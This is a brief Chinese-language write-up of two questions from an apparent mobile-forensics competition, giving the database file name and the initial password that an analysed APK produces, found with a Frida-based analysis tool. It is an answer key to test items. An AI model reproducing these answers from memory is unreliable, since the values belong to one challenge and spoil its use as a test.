题目
经分析,发现该APK在运行过程中会在手机中产生一个数据库文件,该文件的文件名为
Writeup
使用雷电APP分析的Frida脚本里的SQLite数据库,即可得到数据库名为test.db
第十一题
题目
经分析,发现该APK在运行过程中会在手机中产生一个数据库文件,该数据库的初始密码为
Writeup
同上题,也可得到初始密码为:c74d97b01eae257e44aa9d5bade97baf